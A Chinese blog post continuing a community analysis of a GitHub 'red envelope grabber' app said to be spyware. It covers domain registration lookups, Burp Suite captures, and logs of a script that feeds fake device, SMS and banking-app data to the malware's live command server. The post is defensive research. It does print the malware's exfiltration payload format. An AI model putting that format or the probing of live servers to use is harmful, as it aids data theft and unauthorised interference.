专栏文章

关于“抢红包外挂”的进一步分析

FFlowerAccepted
科技·工程参与者 3已保存评论 2

文章操作

快速查看文章及其快照的属性,并进行相关操作。

当前评论
2 条
当前快照
2 份
快照标识符
@mk84t91h
此快照首次捕获于
2026/01/10 17:57
上个月
此快照最后确认于
2026/01/10 17:57
上个月
查看原文

0x00 前言

访问量(2025.1.2 22:00起):
免责声明
本文仅是基于客观现实的学术研究推断。
不得侵犯作者的合法权益
省流提示
本文及其长,且含有大量图片。
警告
如类似操作,请谨慎!
看完 Hughpig 的《深度逆向:GitHub 高星“抢红包外挂”竟是专业级间谍木马》后,我认为有必要对这个东西背后的事进行一些研究。
这里应该有一些东西,还是放到最后说?

0x01

先 Ping 一波。
首先我查了其涉及的 umeng.compuata.info 的备案:
发现其都是一个企业:北京锐讯灵通科技有限公司 名下的网站,再查公安备案:
推测友盟网是一个 armor buff,核心是 puata.info,但是我们还要进一步研究。
对其企业进行搜索:百度百科词条
内容
北京锐讯灵通科技有限公司成立于2010年11月4日,是注册于北京市朝阳区的有限责任公司,法定代表人为毛波,属其他科技推广服务业(国标行业M7590) [1] [3-4]。该公司注册资本404.528万元人民币,实缴资本与注册资本相同,2024年参保人数为3人 [1] [3] [6]。
企业主要业务包含技术转让、计算机系统服务及经营电信业务,旗下产品友盟 提供移动应用数据统计分析等服务 [2] [4]。公司于2013年4月完成8000万美元并购轮融资,现由杭州臻希投资管理有限公司全资控股 [2] [6] [8]。截至2024年,公司存在股权出质、经营异常名录等风险事项 [1] [4] [6]。
北京锐讯灵通科技有限公司于2010年11月4日成立,最初登记机关为海淀分局,后变更至北京市朝阳区市场监督管理局 [5-6]。2023年9月26日,控股股东由浙江淘宝网络有限公司变更为杭州臻希投资管理有限公司,持股比例保持100% [1] [3] [8]。2024年2月28日,法定代表人由马旭涛变更为毛波 [1] [4] [6]。
企业经营范围涵盖技术转让与咨询服务、广告业务代理、计算机系统服务及电信业务经营 [4-5] [7]。核心产品友盟+为移动开发者提供数据统计分析、广告监测等技术服务 [2] [7-8]。2022年5月起,友盟统计逐步停止免费服务项目 [2] [7]。
截至2024年,公司拥有3项软件著作权,备案京ICP备11021163号网站17个,持有电信业务经营许可证等4项行政许可 [2-3] [7]。2024年10月5日,新增友盟统计分析客户端产品 [1] [8]。
2024年9月27日,公司股东出质全部股权404.528万元 [1] [4] [6]。历史风险包括2022年6月法定代表人变更纠纷、2023年涉浩辰软件科创板上市公告事项 [1] [6] [8]。司法案件累计4件,涉及股权出质登记等民事纠纷 [4] [6] [8]。
企业类型为法人独资有限责任公司,营业期限至2060年11月3日 [4-6]。主要人员包括执行董事毛波、监事朱奕及财务负责人龚正渊 [1] [4-5]。对外投资北京无限美好科技有限公司(已注销)等1家企业 [1] [3] [6]。
好像他妈惹到大手子了:
!
看来这个友盟和瓴羊没什么关系啊。
初步推测,有可能是黑客借助了这些网站来……,也有可能……。

0x02

同一天,Hughpig 大神也对其进行了一些分析,但是由于进展不佳没有发文。
这是他给我的南明离火分析报告
他正在尝试取 a token(注意只是发包的补齐标头的字段)。太隐秘了,目前是失败的。
我访问其网站,发现 https://yumao.puata.info/anti_logs 访问后下载文件
JSON
{"resp_code": 1,"msg": "Unexpected Exception BLANK MESSAGE"}
https://yumao.puata.info/cc_info(这个目录的名字很有意思,也许有些来头):
JSON
{"resp_code": 1,"msg": "Unexpected Exception BLANK MESSAGE"}
同时,我先捞一下原文回复里的吾爱论坛同步链接
Hughpig 截包取得一定进展。
通过一些友盟官方网站的帮助信息我初步推断是其服务被黑客滥用。
下载 Android Studio,打算虚拟沙箱测试,但是下载其应用后无法安装,且快把我 i5 的电脑搞垮了。
然后 Hughpig 截到包了!详见https://luogu.qzz.io/paste/7t4gi0mq
我尝试用 burp suite,得到日志如下:
req historyXML
<?xml version="1.1"?>
<!-- NOTE: Any NULL bytes in requests and responses are preserved within this output, even though this strictly breaks the XML syntax. If your XML parser rejects the NULL bytes then you will need to remove or replace these bytes before parsing. Alternatively, you can use the option to base64-encode requests and responses. -->
<!DOCTYPE items [
<!ELEMENT items (item*)>
<!ATTLIST items burpVersion CDATA "">
<!ATTLIST items exportTime CDATA "">
<!ELEMENT item (time, url, host, port, protocol, method, path, extension, request, status, responselength, mimetype, response, comment)>
<!ELEMENT time (#PCDATA)>
<!ELEMENT url (#PCDATA)>
<!ELEMENT host (#PCDATA)>
<!ATTLIST host ip CDATA "">
<!ELEMENT port (#PCDATA)>
<!ELEMENT protocol (#PCDATA)>
<!ELEMENT method (#PCDATA)>
<!ELEMENT path (#PCDATA)>
<!ELEMENT extension (#PCDATA)>
<!ELEMENT request (#PCDATA)>
<!ATTLIST request base64 (true|false) "false">
<!ELEMENT status (#PCDATA)>
<!ELEMENT responselength (#PCDATA)>
<!ELEMENT mimetype (#PCDATA)>
<!ELEMENT response (#PCDATA)>
<!ATTLIST response base64 (true|false) "false">
<!ELEMENT comment (#PCDATA)>
]>
<items burpVersion="2025.12.2" exportTime="Sat Jan 03 11:59:33 CST 2026">
  <item>
    <time>Sat Jan 03 11:56:53 CST 2026</time>
    <url><![CDATA[https://yumao.puata.info/cc_info]]></url>
    <host ip="223.109.148.130">yumao.puata.info</host>
    <port>443</port>
    <protocol>https</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/cc_info]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[GET /cc_info HTTP/1.1
Host: yumao.puata.info
Sec-Ch-Ua: "Chromium";v="143", "Not A(Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Sec-Purpose: prefetch;prerender
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

]]></request>
    <status>200</status>
    <responselength>236</responselength>
    <mimetype>JSON</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: Tengine
Date: Sat, 03 Jan 2026 03:56:54 GMT
Content-Type: application/octet-stream
Content-Length: 60
Connection: close
Content-Encoding: none

{"resp_code": 1,"msg": "Unexpected Exception BLANK MESSAGE"}]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Sat Jan 03 11:56:54 CST 2026</time>
    <url><![CDATA[https://yumao.puata.info/cc_info]]></url>
    <host ip="223.109.148.130">yumao.puata.info</host>
    <port>443</port>
    <protocol>https</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/cc_info]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[GET /cc_info HTTP/1.1
Host: yumao.puata.info
Sec-Ch-Ua: "Chromium";v="143", "Not A(Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

]]></request>
    <status>200</status>
    <responselength>236</responselength>
    <mimetype>JSON</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: Tengine
Date: Sat, 03 Jan 2026 03:56:54 GMT
Content-Type: application/octet-stream
Content-Length: 60
Connection: close
Content-Encoding: none

{"resp_code": 1,"msg": "Unexpected Exception BLANK MESSAGE"}]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Sat Jan 03 11:56:54 CST 2026</time>
    <url><![CDATA[https://sb-ssl.google.com/safebrowsing/clientreport/download?key=dummytoken]]></url>
    <host ip="142.250.69.174">sb-ssl.google.com</host>
    <port>443</port>
    <protocol>https</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/safebrowsing/clientreport/download?key=dummytoken]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[POST /safebrowsing/clientreport/download?key=dummytoken HTTP/1.1
Host: sb-ssl.google.com
Content-Length: 338
Content-Type: application/octet-stream
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Priority: u=4, i
Connection: keep-alive


 https://yumao.puata.info/cc_info."
 ..(.I.I5.	.f............d.;z.F...<"1
 https://yumao.puata.info/cc_info...	127.0.0.1"."$
 https://yumao.puata.info/cc_info..*.0.J.cc_info (3)P.Z.zh-CN.....3....(.0.8.@.J.Chrome/143.0.7499.147/Mac OS XP.X............B
 https://yumao.puata.info/cc_info...	127.0.0.1".0.9..X. .yBP.X.p....................]]></request>
    <status></status>
    <responselength></responselength>
    <mimetype></mimetype>
    <response base64="false"></response>
    <comment></comment>
  </item>
  <item>
    <time>Sat Jan 03 11:57:16 CST 2026</time>
    <url><![CDATA[https://yumao.puata.info/cc_info]]></url>
    <host ip="223.109.148.130">yumao.puata.info</host>
    <port>443</port>
    <protocol>https</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/cc_info]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[GET /cc_info HTTP/1.1
Host: yumao.puata.info
Sec-Ch-Ua: "Chromium";v="143", "Not A(Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive
Content-Length: 713

{"os":"Android","dm":"HUAWEI P60 Pro","av":"1.1.18","umid":"aif2c6249634f0ebb50eb7024a2a4383a3","ov":"12","chn":"Voldev","puid":"","zid":"AXRTS3J6bR9IIiL6FsOVTco4ajC-rWsF0E0M0G9Wo4gJA_DxXMsND95kQH_aqhmCPULyKB3qZrhA3MRhnypxFXt0o5hHSxHUVojAnzl5EfqBop2xNXA=","sv":"1.1.2","ak":"5f215eaeb4b08b653e8f68ed","idfa":"","db":"HUAWEI","aid":"8da127b0b834405e","oaid":"","boa":"DCO-AL00","mant":1766650773000,"ct":"CN","lang":"zh","tz":8,"pkg":"com.qqq.WXhongbao","disn":"............","ac":"wifi","nt":10,"hit_sdk":"anti","sdk":["anti"],"lbs":[{"lat":31.247568281666666,"lng":121.402748259,"alt":800,"acc":0.020099999383091927,"lts":1767409784676}],"installed_apps":["com.eg.android.AlipayGphone","com.icbc.mobilebanking"]}]]></request>
    <status>200</status>
    <responselength>225</responselength>
    <mimetype>JSON</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: Tengine
Date: Sat, 03 Jan 2026 03:57:37 GMT
Content-Type: application/octet-stream
Content-Length: 49
Connection: close
Content-Encoding: none

{"resp_code": 1,"msg": "http header......appkey"}]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Sat Jan 03 11:57:36 CST 2026</time>
    <url><![CDATA[https://sb-ssl.google.com/safebrowsing/clientreport/download?key=dummytoken]]></url>
    <host ip="142.250.69.174">sb-ssl.google.com</host>
    <port>443</port>
    <protocol>https</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/safebrowsing/clientreport/download?key=dummytoken]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[POST /safebrowsing/clientreport/download?key=dummytoken HTTP/1.1
Host: sb-ssl.google.com
Content-Length: 338
Content-Type: application/octet-stream
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Priority: u=4, i
Connection: keep-alive


 https://yumao.puata.info/cc_info."
 .....l1.~..	..8.		.a..b...2N;....1"1
 https://yumao.puata.info/cc_info...	127.0.0.1"."$
 https://yumao.puata.info/cc_info..*.0.J.cc_info (4)P.Z.zh-CN.....3....(.0.8.@.J.Chrome/143.0.7499.147/Mac OS XP.X............B
 https://yumao.puata.info/cc_info...	127.0.0.1".0.9.... .yBP.X.p....................]]></request>
    <status></status>
    <responselength></responselength>
    <mimetype></mimetype>
    <response base64="false"></response>
    <comment></comment>
  </item>
</items>
JSON
{"resp_code": 1,"msg": "http header缺少appkey"}
再试另外一个:
YAML
HTTP/1.1 200 OK
Server: Tengine
Date: Sat, 03 Jan 2026 04:09:59 GMT
Content-Type: application/octet-stream
Content-Length: 49
Connection: close
Content-Encoding: none

{"resp_code": 1,"msg": "http header缺少appkey"}
uhh
YAML
HTTP/1.1 200 OK
Server: Tengine
Date: Sat, 03 Jan 2026 04:13:26 GMT
Content-Type: application/octet-stream
Content-Length: 65
Connection: close
Content-Encoding: none

{"resp_code": 1,"msg": "Unexpected Exception:Not in GZIP format"}
YAML
HTTP/1.1 200 OK
Server: Tengine
Date: Sat, 03 Jan 2026 04:19:52 GMT
Content-Type: application/octet-stream
Content-Length: 60
Connection: close
Content-Encoding: none

{"resp_code": 1,"msg": "Unexpected Exception BLANK MESSAGE"}
这限制真严。
乐:
跌跌撞撞仍然无果。

0x03

分析的结论是它违法了,【依据已经有了后面忘了待补充】,显然是未合规使用友盟 SDK(加了可选选项)
再看 Hughpig。他让 AI 写了测试脚本。
我稍微改了下,得到一下结果:
YAML
💀 C2 Hunter 已启动 - 目标: yumao.puata.info

[Step 1] 发送注册包 (cc_info)...
📝 [明文预览] {"ak":"5f215eaeb4b08b653e8f68ed","aid":"ba603fd278734dce","atoken":"Abme-vHJ6xOFd09zPQqZ9HMrnF0gJ1t-_eaXzLRYLDSpv_vEld9KC0Ohpkj4-Q_MY9qp421Zf3oxg-63xiIo_ozzHgWI4oFqBDFwlZRjfZUbevOyzvQ=","umid":"aif2c6249634f0ebb50eb7024a2a4383a3","os":"Android","dm":"\u5bcc\u7f73\u79d1\u6280\u6709\u9650\u516c\u53f8 <bound method Provider.word of <faker.providers.lorem.zh_CN.Provider object at 0x10fdf5f90>> 43 Pro","db":"\u5bcc\u7f73\u79d1\u6280\u6709\u9650\u516c\u53f8","ov":"12","sv":"1.1.2","av":"1.1.18","chn":"Voldev","pkg":"com.qqq.WXhongbao","cts":1767434448846,"ac":"5G","nt":20,"hit_sdk":"anti","sdk":["anti"],"zid":"Abme-vHJ6xOFd09zPQqZ9HMrnF0gJ1t-_eaXzLRYLDSpv_vEld9KC0Ohpkj4-Q_MY9qp421Zf3oxg-63xiIo_ozzHgWI4oFqBDFwlZRjfZUbevOyzvQ=","lbs":[{"lat":31.230113249296096,"lng":121.4729230248714,"alt":10.5,"acc":20.0,"lts":1767434448846}]}...
📩 注册响应: {"resp_code": 0,"msg": "success"}

[Step 2] 启动心跳诱捕循环 (anti_logs)...
📝 [明文预览] {"ak":"5f215eaeb4b08b653e8f68ed","aid":"ba603fd278734dce","atoken":"Abme-vHJ6xOFd09zPQqZ9HMrnF0gJ1t-_eaXzLRYLDSpv_vEld9KC0Ohpkj4-Q_MY9qp421Zf3oxg-63xiIo_ozzHgWI4oFqBDFwlZRjfZUbevOyzvQ=","umid":"aif2c6249634f0ebb50eb7024a2a4383a3","os":"Android","dm":"\u53cc\u654f\u7535\u5b50\u79d1\u6280\u6709\u9650\u516c\u53f8 <bound method Provider.word of <faker.providers.lorem.zh_CN.Provider object at 0x10fabb250>> 16 Pro","db":"\u53cc\u654f\u7535\u5b50\u79d1\u6280\u6709\u9650\u516c\u53f8","ov":"12","sv":"1.1.2","av":"1.1.18","chn":"Voldev","pkg":"com.qqq.WXhongbao","cts":1767434449159,"ac":"5G","nt":20,"anti":{"mcc":"460","mnc":"00","net":"5G","battery":{"le":69,"vo":4,"te":302,"st":2,"ch":1,"ts":1767434449159},"last_sms":{"sender":"95588","content":"\u3010\u5de5\u5546\u94f6\u884c\u3011\u60a8\u5c3e\u53f78888\u5361\u4e8e1\u67083\u65e517:00\u6536\u5165(\u8de8\u884c\u8f6c\u8d26)810946\u5143\uff0c\u4f59\u989d407502461\u5143\u3002","time":1762588261437}},"installed_apps":null}...

📡 [ 1 次心跳] 发送诱饵包 (Size: 633)
📩 服务器回包: {"resp_code": 0,"msg": "success","imp":{"first_log_time":"1767406400849","first_app_version":"1.1.18","first_app_channel":"Voldev"}}
ℹ️ (无载荷) imp: {'first_log_time': '1767406400849', 'first_app_version': '1.1.18', 'first_app_channel': 'Voldev'}
💤 休眠 2389267 微秒...
📝 [明文预览] {"ak":"5f215eaeb4b08b653e8f68ed","aid":"ba603fd278734dce","atoken":"Abme-vHJ6xOFd09zPQqZ9HMrnF0gJ1t-_eaXzLRYLDSpv_vEld9KC0Ohpkj4-Q_MY9qp421Zf3oxg-63xiIo_ozzHgWI4oFqBDFwlZRjfZUbevOyzvQ=","umid":"aif2c6249634f0ebb50eb7024a2a4383a3","os":"Android","dm":"\u8bfa\u4f9d\u66fc\u8f6f\u4ef6\u4fe1\u606f\u6709\u9650\u516c\u53f8 <bound method Provider.word of <faker.providers.lorem.zh_CN.Provider object at 0x10fe03610>> 66 Pro","db":"\u8bfa\u4f9d\u66fc\u8f6f\u4ef6\u4fe1\u606f\u6709\u9650\u516c\u53f8","ov":"12","sv":"1.1.2","av":"1.1.18","chn":"Voldev","pkg":"com.qqq.WXhongbao","cts":1767434451853,"ac":"5G","nt":20,"anti":{"mcc":"460","mnc":"00","net":"5G","battery":{"le":67,"vo":4,"te":349,"st":2,"ch":1,"ts":1767434451853},"last_sms":{"sender":"95588","content":"\u3010\u5de5\u5546\u94f6\u884c\u3011\u60a8\u5c3e\u53f78888\u5361\u4e8e1\u67083\u65e517:00\u6536\u5165(\u8de8\u884c\u8f6c\u8d26)808362\u5143\uff0c\u4f59\u989d1225675383\u5143\u3002","time":1756116587854}},"installed_apps":null}...


...


📡 [ 57 次心跳] 发送诱饵包 (Size: 625)
📩 服务器回包: {"resp_code": 0,"msg": "success","imp":{"first_log_time":"1767406400849","first_app_version":"1.1.18","first_app_channel":"Voldev"}}
ℹ️ (无载荷) imp: {'first_log_time': '1767406400849', 'first_app_version': '1.1.18', 'first_app_channel': 'Voldev'}
💤 休眠 7988169 微秒...
出了点 faker 的问题,重制:
YAML
💀 C2 Hunter 已启动 - 目标: yumao.puata.info

[Step 1] 发送注册包 (cc_info)...
📝 [明文预览] {"ak":"5f215eaeb4b08b653e8f68ed","aid":"ba603fd278734dce","atoken":"Abme-vHJ6xOFd09zPQqZ9HMrnF0gJ1t-_eaXzLRYLDSpv_vEld9KC0Ohpkj4-Q_MY9qp421Zf3oxg-63xiIo_ozzHgWI4oFqBDFwlZRjfZUbevOyzvQ=","umid":"aif2c6249634f0ebb50eb7024a2a4383a3","os":"Android","dm":"HUAWEI Mate60 Pro","db":"HUAWEI","ov":"12","sv":"1.1.2","av":"1.1.18","chn":"Voldev","pkg":"com.qqq.WXhongbao","cts":1767434893952,"ac":"5G","nt":20,"hit_sdk":"anti","sdk":["anti"],"zid":"Abme-vHJ6xOFd09zPQqZ9HMrnF0gJ1t-_eaXzLRYLDSpv_vEld9KC0Ohpkj4-Q_MY9qp421Zf3oxg-63xiIo_ozzHgWI4oFqBDFwlZRjfZUbevOyzvQ=","lbs":[{"lat":31.22977835846476,"lng":121.47440659221566,"alt":10.5,"acc":20.0,"lts":1767434893952}]}...
📩 注册响应: {"resp_code": 0,"msg": "success"}

[Step 2] 启动心跳诱捕循环 (anti_logs)...
📝 [明文预览] {"ak":"5f215eaeb4b08b653e8f68ed","aid":"ba603fd278734dce","atoken":"Abme-vHJ6xOFd09zPQqZ9HMrnF0gJ1t-_eaXzLRYLDSpv_vEld9KC0Ohpkj4-Q_MY9qp421Zf3oxg-63xiIo_ozzHgWI4oFqBDFwlZRjfZUbevOyzvQ=","umid":"aif2c6249634f0ebb50eb7024a2a4383a3","os":"Android","dm":"HUAWEI Mate60 Pro","db":"HUAWEI","ov":"12","sv":"1.1.2","av":"1.1.18","chn":"Voldev","pkg":"com.qqq.WXhongbao","cts":1767434894261,"ac":"5G","nt":20,"anti":{"mcc":"460","mnc":"00","net":"5G","battery":{"le":60,"vo":4,"te":327,"st":2,"ch":1,"ts":1767434894261},"last_sms":{"sender":"95588","content":"\u3010\u5de5\u5546\u94f6\u884c\u3011\u60a8\u5c3e\u53f78888\u5361\u4e8e1\u67083\u65e517:00\u6536\u5165(\u8de8\u884c\u8f6c\u8d26)679965\u5143\uff0c\u4f59\u989d1568218380\u5143\u3002","time":1759769018879}},"installed_apps":["com.eg.android.AlipayGphone","com.icbc.mobilebanking","com.cmbchina.cmbmbank","com.wallet.crypto.trustapp"]}...

📡 [ 1 次心跳] 发送诱饵包 (Size: 610)
📩 服务器回包: {"resp_code": 0,"msg": "success","imp":{"first_log_time":"1767406400849","first_app_version":"1.1.18","first_app_channel":"Voldev"}}
ℹ️ (无载荷) imp: {'first_log_time': '1767406400849', 'first_app_version': '1.1.18', 'first_app_channel': 'Voldev'}
💤 休眠 4364148 微秒...
📝 [明文预览] {"ak":"5f215eaeb4b08b653e8f68ed","aid":"ba603fd278734dce","atoken":"Abme-vHJ6xOFd09zPQqZ9HMrnF0gJ1t-_eaXzLRYLDSpv_vEld9KC0Ohpkj4-Q_MY9qp421Zf3oxg-63xiIo_ozzHgWI4oFqBDFwlZRjfZUbevOyzvQ=","umid":"aif2c6249634f0ebb50eb7024a2a4383a3","os":"Android","dm":"HUAWEI Mate60 Pro","db":"HUAWEI","ov":"12","sv":"1.1.2","av":"1.1.18","chn":"Voldev","pkg":"com.qqq.WXhongbao","cts":1767434898955,"ac":"5G","nt":20,"anti":{"mcc":"460","mnc":"00","net":"5G","battery":{"le":69,"vo":4,"te":310,"st":2,"ch":1,"ts":1767434898955},"last_sms":{"sender":"95588","content":"\u3010\u5de5\u5546\u94f6\u884c\u3011\u60a8\u5c3e\u53f78888\u5361\u4e8e1\u67083\u65e517:00\u6536\u5165(\u8de8\u884c\u8f6c\u8d26)921031\u5143\uff0c\u4f59\u989d1353482058\u5143\u3002","time":1757698128960}},"installed_apps":["com.eg.android.AlipayGphone","com.icbc.mobilebanking","com.cmbchina.cmbmbank","com.wallet.crypto.trustapp"]}...

📡 [ 2 次心跳] 发送诱饵包 (Size: 609)
📩 服务器回包: {"resp_code": 0,"msg": "success","imp":{"first_log_time":"1767406400849","first_app_version":"1.1.18","first_app_channel":"Voldev"}}
ℹ️ (无载荷) imp: {'first_log_time': '1767406400849', 'first_app_version': '1.1.18', 'first_app_channel': 'Voldev'}
💤 休眠 7551343 微秒...
📝 [明文预览] {"ak":"5f215eaeb4b08b653e8f68ed","aid":"ba603fd278734dce","atoken":"Abme-vHJ6xOFd09zPQqZ9HMrnF0gJ1t-_eaXzLRYLDSpv_vEld9KC0Ohpkj4-Q_MY9qp421Zf3oxg-63xiIo_ozzHgWI4oFqBDFwlZRjfZUbevOyzvQ=","umid":"aif2c6249634f0ebb50eb7024a2a4383a3","os":"Android","dm":"HUAWEI Mate60 Pro","db":"HUAWEI","ov":"12","sv":"1.1.2","av":"1.1.18","chn":"Voldev","pkg":"com.qqq.WXhongbao","cts":1767434906860,"ac":"5G","nt":20,"anti":{"mcc":"460","mnc":"00","net":"5G","battery":{"le":79,"vo":4,"te":345,"st":2,"ch":1,"ts":1767434906860},"last_sms":{"sender":"95588","content":"\u3010\u5de5\u5546\u94f6\u884c\u3011\u60a8\u5c3e\u53f78888\u5361\u4e8e1\u67083\u65e517:00\u6536\u5165(\u8de8\u884c\u8f6c\u8d26)897820\u5143\uff0c\u4f59\u989d1933488794\u5143\u3002","time":1759959516067}},"installed_apps":["com.eg.android.AlipayGphone","com.icbc.mobilebanking","com.cmbchina.cmbmbank","com.wallet.crypto.trustapp"]}...

📡 [ 3 次心跳] 发送诱饵包 (Size: 610)
📩 服务器回包: {"resp_code": 0,"msg": "success","imp":{"first_log_time":"1767406400849","first_app_version":"1.1.18","first_app_channel":"Voldev"}}
ℹ️ (无载荷) imp: {'first_log_time': '1767406400849', 'first_app_version': '1.1.18', 'first_app_channel': 'Voldev'}
💤 休眠 8440885 微秒...
📝 [明文预览] {"ak":"5f215eaeb4b08b653e8f68ed","aid":"ba603fd278734dce","atoken":"Abme-vHJ6xOFd09zPQqZ9HMrnF0gJ1t-_eaXzLRYLDSpv_vEld9KC0Ohpkj4-Q_MY9qp421Zf3oxg-63xiIo_ozzHgWI4oFqBDFwlZRjfZUbevOyzvQ=","umid":"aif2c6249634f0ebb50eb7024a2a4383a3","os":"Android","dm":"HUAWEI Mate60 Pro","db":"HUAWEI","ov":"12","sv":"1.1.2","av":"1.1.18","chn":"Voldev","pkg":"com.qqq.WXhongbao","cts":1767434915562,"ac":"5G","nt":20,"anti":{"mcc":"460","mnc":"00","net":"5G","battery":{"le":83,"vo":4,"te":328,"st":2,"ch":1,"ts":1767434915562},"last_sms":{"sender":"95588","content":"\u3010\u5de5\u5546\u94f6\u884c\u3011\u60a8\u5c3e\u53f78888\u5361\u4e8e1\u67083\u65e517:00\u6536\u5165(\u8de8\u884c\u8f6c\u8d26)671287\u5143\uff0c\u4f59\u989d1720431336\u5143\u3002","time":1758326691089}},"installed_apps":["com.eg.android.AlipayGphone","com.icbc.mobilebanking","com.cmbchina.cmbmbank","com.wallet.crypto.trustapp"]}...

📡 [ 4 次心跳] 发送诱饵包 (Size: 609)
📩 服务器回包: {"resp_code": 0,"msg": "success","imp":{"first_log_time":"1767406400849","first_app_version":"1.1.18","first_app_channel":"Voldev"}}
ℹ️ (无载荷) imp: {'first_log_time': '1767406400849', 'first_app_version': '1.1.18', 'first_app_channel': 'Voldev'}
💤 休眠 6386283 微秒...
📝 [明文预览] {"ak":"5f215eaeb4b08b653e8f68ed","aid":"ba603fd278734dce","atoken":"Abme-vHJ6xOFd09zPQqZ9HMrnF0gJ1t-_eaXzLRYLDSpv_vEld9KC0Ohpkj4-Q_MY9qp421Zf3oxg-63xiIo_ozzHgWI4oFqBDFwlZRjfZUbevOyzvQ=","umid":"aif2c6249634f0ebb50eb7024a2a4383a3","os":"Android","dm":"HUAWEI Mate60 Pro","db":"HUAWEI","ov":"12","sv":"1.1.2","av":"1.1.18","chn":"Voldev","pkg":"com.qqq.WXhongbao","cts":1767434922293,"ac":"5G","nt":20,"anti":{"mcc":"460","mnc":"00","net":"5G","battery":{"le":85,"vo":4,"te":337,"st":2,"ch":1,"ts":1767434922293},"last_sms":{"sender":"95588","content":"\u3010\u5de5\u5546\u94f6\u884c\u3011\u60a8\u5c3e\u53f78888\u5361\u4e8e1\u67083\u65e517:00\u6536\u5165(\u8de8\u884c\u8f6c\u8d26)603785\u5143\uff0c\u4f59\u989d1537658333\u5143\u3002","time":1766168633373}},"installed_apps":["com.eg.android.AlipayGphone","com.icbc.mobilebanking","com.cmbchina.cmbmbank","com.wallet.crypto.trustapp"]}...

📡 [ 5 次心跳] 发送诱饵包 (Size: 610)
📩 服务器回包: {"resp_code": 0,"msg": "success","imp":{"first_log_time":"1767406400849","first_app_version":"1.1.18","first_app_channel":"Voldev"}}
ℹ️ (无载荷) imp: {'first_log_time': '1767406400849', 'first_app_version': '1.1.18', 'first_app_channel': 'Voldev'}
💤 休眠 1479067 微秒...
突有种调戏 CIA 的感觉。Hughpig 模拟服务器发命给 app,看到应用程序会干坏事。所以我们证实了我们的部分看法。
Hughpig 挂了三小时这段代码挂出来滚木,我挂了 90 min 也没得到服务器命令。

0x04

转过头来,对其域名进行病毒检测(图片可以点):
发现其与四千五百个文件产生通信。
随机抽取两个看了下,里面一大堆严重警告:

评论

2 条评论,欢迎与作者交流。

正在加载评论...